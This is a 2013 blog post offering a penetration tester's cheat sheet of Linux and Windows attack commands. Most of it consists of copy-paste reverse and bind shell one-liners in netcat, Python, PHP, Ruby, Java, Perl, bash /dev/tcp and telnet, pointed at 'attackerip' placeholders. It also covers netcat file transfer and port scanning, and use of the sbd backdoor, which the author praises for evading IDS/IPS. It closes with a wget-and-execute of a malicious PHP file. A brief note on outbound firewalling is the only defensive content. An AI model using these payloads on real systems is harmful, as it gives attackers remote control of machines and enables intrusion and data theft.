Sunday, May 12, 2013

Linux Hackers Command Reference

Linux Command Reference for Pen-testers



This part of the blog is dedicated to Linux and Unix-like commands that can be used from Penetration Testers (yea who is your tester?) and Information Security Administrators. In this page I will periodically post Linux tiny simple scripts and commands that a Penetration tester or a Security Administrator can use to:


1. Perform Administration Security tasks (e.g use windows/linux netcat to bind shells e.t.c).

2. Run Vulnerability Scans (e.g Identify null sessions, test for LANMAN services e.t.c).

3. Do pivoting (e.g after compromising a machine use windows tools to escalate e.t.c).



Using Netcat to Bind Shell




Launching a listening shell in windows and binding from linux:

nc.exe -L -p <listening port> -e cmd.exe - Running in windows box

nc <windows box ip> <windows port> - Run in Linux/Unix-like box

Launching a listening shell in Linux/Unix-like and binding from Windows:

nc -l -p <listening port> -e /bin/sh - Running in Linux/Unix-like box

nc.exe <linux box ip> <linux port> - Run in Windows box


Using Netcat to transfer files


This can be used to transfer types of files from Linux to windows: 

nc.exe -lvvp 4444 > output.txt - Running in the Linux/Unix-like box
cat input.txt | nc.exe -vv 192.168.8.74 4444 - Run in Windows box


This can be used to transfer all type of files from windows to Linux: 

nc.exe -lvvp 4444 > output.exe - Running in the Linux box
type input.exe | nc -vv <windows box ip> 4444 - Run in Windows box


Note:
You might want to run a file command to identify the type of the file you want to transfer. There is no difference between transferring binary and text files (most of the time).


Using Netcat for port scanning 

nc -v -n -z -w 1 192.168.1.2 1-1000 - Run from Linux/Unix-like box
nc.exe -v -n -z -w 1 192.168.1.2 1-1000 - Run from Linux/Unix-like box


Note: The "-n" parameter here prevents DNS lookup, "-z" makes nc not receive any data from the server, and "-w 1" makes the connection timeout after 1 second of inactivity. The commands above will scan from port 1 to 1000.

Using Python to get shell

This was tested under Linux / Python 2.7:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Using PHP to get shell

This code assumes that the TCP connection uses file descriptor 3. This worked on my test system. If it doesn’t work, try 4, 5, 6…

php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'


Using Ruby to get shell

This shell binds a shell in port 1234 (good for installed ruby in the victim machine):

ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' 
Using Java to get shell 
The following command opens a listening shell in 10.0.0.1:

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()


Using Perl to get shell

And a shorter Perl reverse shell that does not depend on /bin/sh:

perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"attackerip:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;' 

If the target system is running Windows use the following one-liner:

perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"attackerip:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

Alternatives to Bash Shell

Here are some tricks taken from Dameles blog to play with.

exec /bin/bash 0&0 2>&0

Or:

0<&196;exec 196<>/dev/tcp/attackerip/4444; sh <&196 >&196 2>&196

Or:

exec 5<>/dev/tcp/attackerip/4444
cat <&5 | while read line; do $line 2>&5 >&5; done # or:
while read line 0<&5; do $line 2>&5 >&5; done


Using Telnet to get shell


Of course, you can also use Telnet as an alternative for Netcat:

rm -f /tmp/p; mknod /tmp/p p && telnet attackerip 4444 0/tmp/p

Or:

telnet attackerip 4444 | /bin/bash | telnet attackerip 4445 

Note: Remember to listen on your machine also on port 4445/tcp

Using sbd to get shell

An article on http://www.secureit.co.il discussed the availability of sbd (Shadowinteger's Backdoor), available at http://cycom.se/dl/sbd. It is described as a ‘Netcat- clone, designed to be portable and offer strong encryption’. It supports aes-128 encryption and is available on most platforms, including win32 and Linux.
Command with no encryption for listening in Windows: sbd.exe –l –p 5555 –c off
Command with encryption for listening in Windows: sbd.exe –l –p 5555 –c on
Binding a shell to Windows machine with encryption: sbd.exe –l –p 5555 –c on –e cmd.exe
Binding a shell to Windows machine with encryption: sbd.exe –l –p 5555 –c off –e cmd.exe
Command with no encryption for connecting to Windows from Linux: sbd 192.168.11.21 5555 –c off
Command with encryption for connecting to Windows with Linux: sbd 192.168.1.21 5555 –c on
This command will monitor traffic at the server side: sbd -m on -r 0 -l -p 100 -e cmd.exe
This command will cause a port forwarding: sbd 127.0.0.1 2000 | cmd.exe | sbd 127.0.0.1 3000
This command will do perform a connection forwarding: sbd -vv -l -p 90 | sbd -c off www.radarhack.com 80

Note:
The example of the reverse shell should prove that a decent configuration of firewalls in the outbound direction is necessary. In the scenario that a Trojan can be installed on a webserver, it is very important to prevent that this server can connect back out of the network, resulting in a shell for the attacker.

Using sbd to transfer file

For file receiving in Windows the command is: sbd.exe –l –p 5555 > output.txt
For file sending in Linux the command is: cat input.txt | sbd 192.168.11.21 5555


Note: There is not difference in transferring an executable or simply a text file.

Using sbd to respawn the shell

Another interesting feature of sbd if the -r option that allows you to respawn the shell. From the moment the client disconnects, the server side will exit. In order to respawn the server, specify the -r seconds’ switch. The server will be listening a gain after the specified amount of time. This might prevent the backdoor from existing and prevent to reconnect. Specifying a time of 0 seconds, will respawn the server immediately.
Here is a typical interaction with sbd respawning the shell after the connection is droped:

sbd -r 8 f -P server -l -p 100

demolisher: test1

demolisher: test2

sbd -P demolisher 127.0.0.1 100

test1

^C

sbd -P demolisher 127.0.0.1 100

connect(): WSAECONNREFUSED

sbd -P demolisher 127.0.0.1 100

connect(): WSAECONNREFUSED

... after 8 seconds ....

sbd -P demolisher 127.0.0.1 100

test2

After evaluating (or playing in other words), the tool seems very useful and easy to use. It contains (much) less features than netcat, although it offers build-in encryption, which can be useful to avoid IDS/IPS systems, although some will detect malicious behavior, if used on well-known ports.

Useful commands for copy paste

nc &lt;attacker_ip&gt; &lt;port&gt; -e /bin/bash
mknod backpipe p; nc &lt;attacker_ip&gt; &lt;port&gt; 0&lt;backpipe | /bin/bash 1&gt;backpipe
/bin/bash -i &gt; /dev/tcp/&lt;attacker_ip&gt;/&lt;port&gt; 0&lt;&1 2&gt;&1
mknod backpipe p; telnet &lt;attacker_ip&gt; &lt;port&gt; 0&lt;backpipe | /bin/bash 1&gt;backpipe
telnet &lt;attacker_ip&gt; &lt;1st_port&gt; | /bin/bash | telnet &lt;attacker_ip&gt; &lt;2nd_port&gt;
wget -O /tmp/bd.php &lt;url_to_malicious_file&gt; && php -f /tmp/bd.php

References:
http://pentestmonkey.net
http://wikipedia.org
blog

No comments:

Post a Comment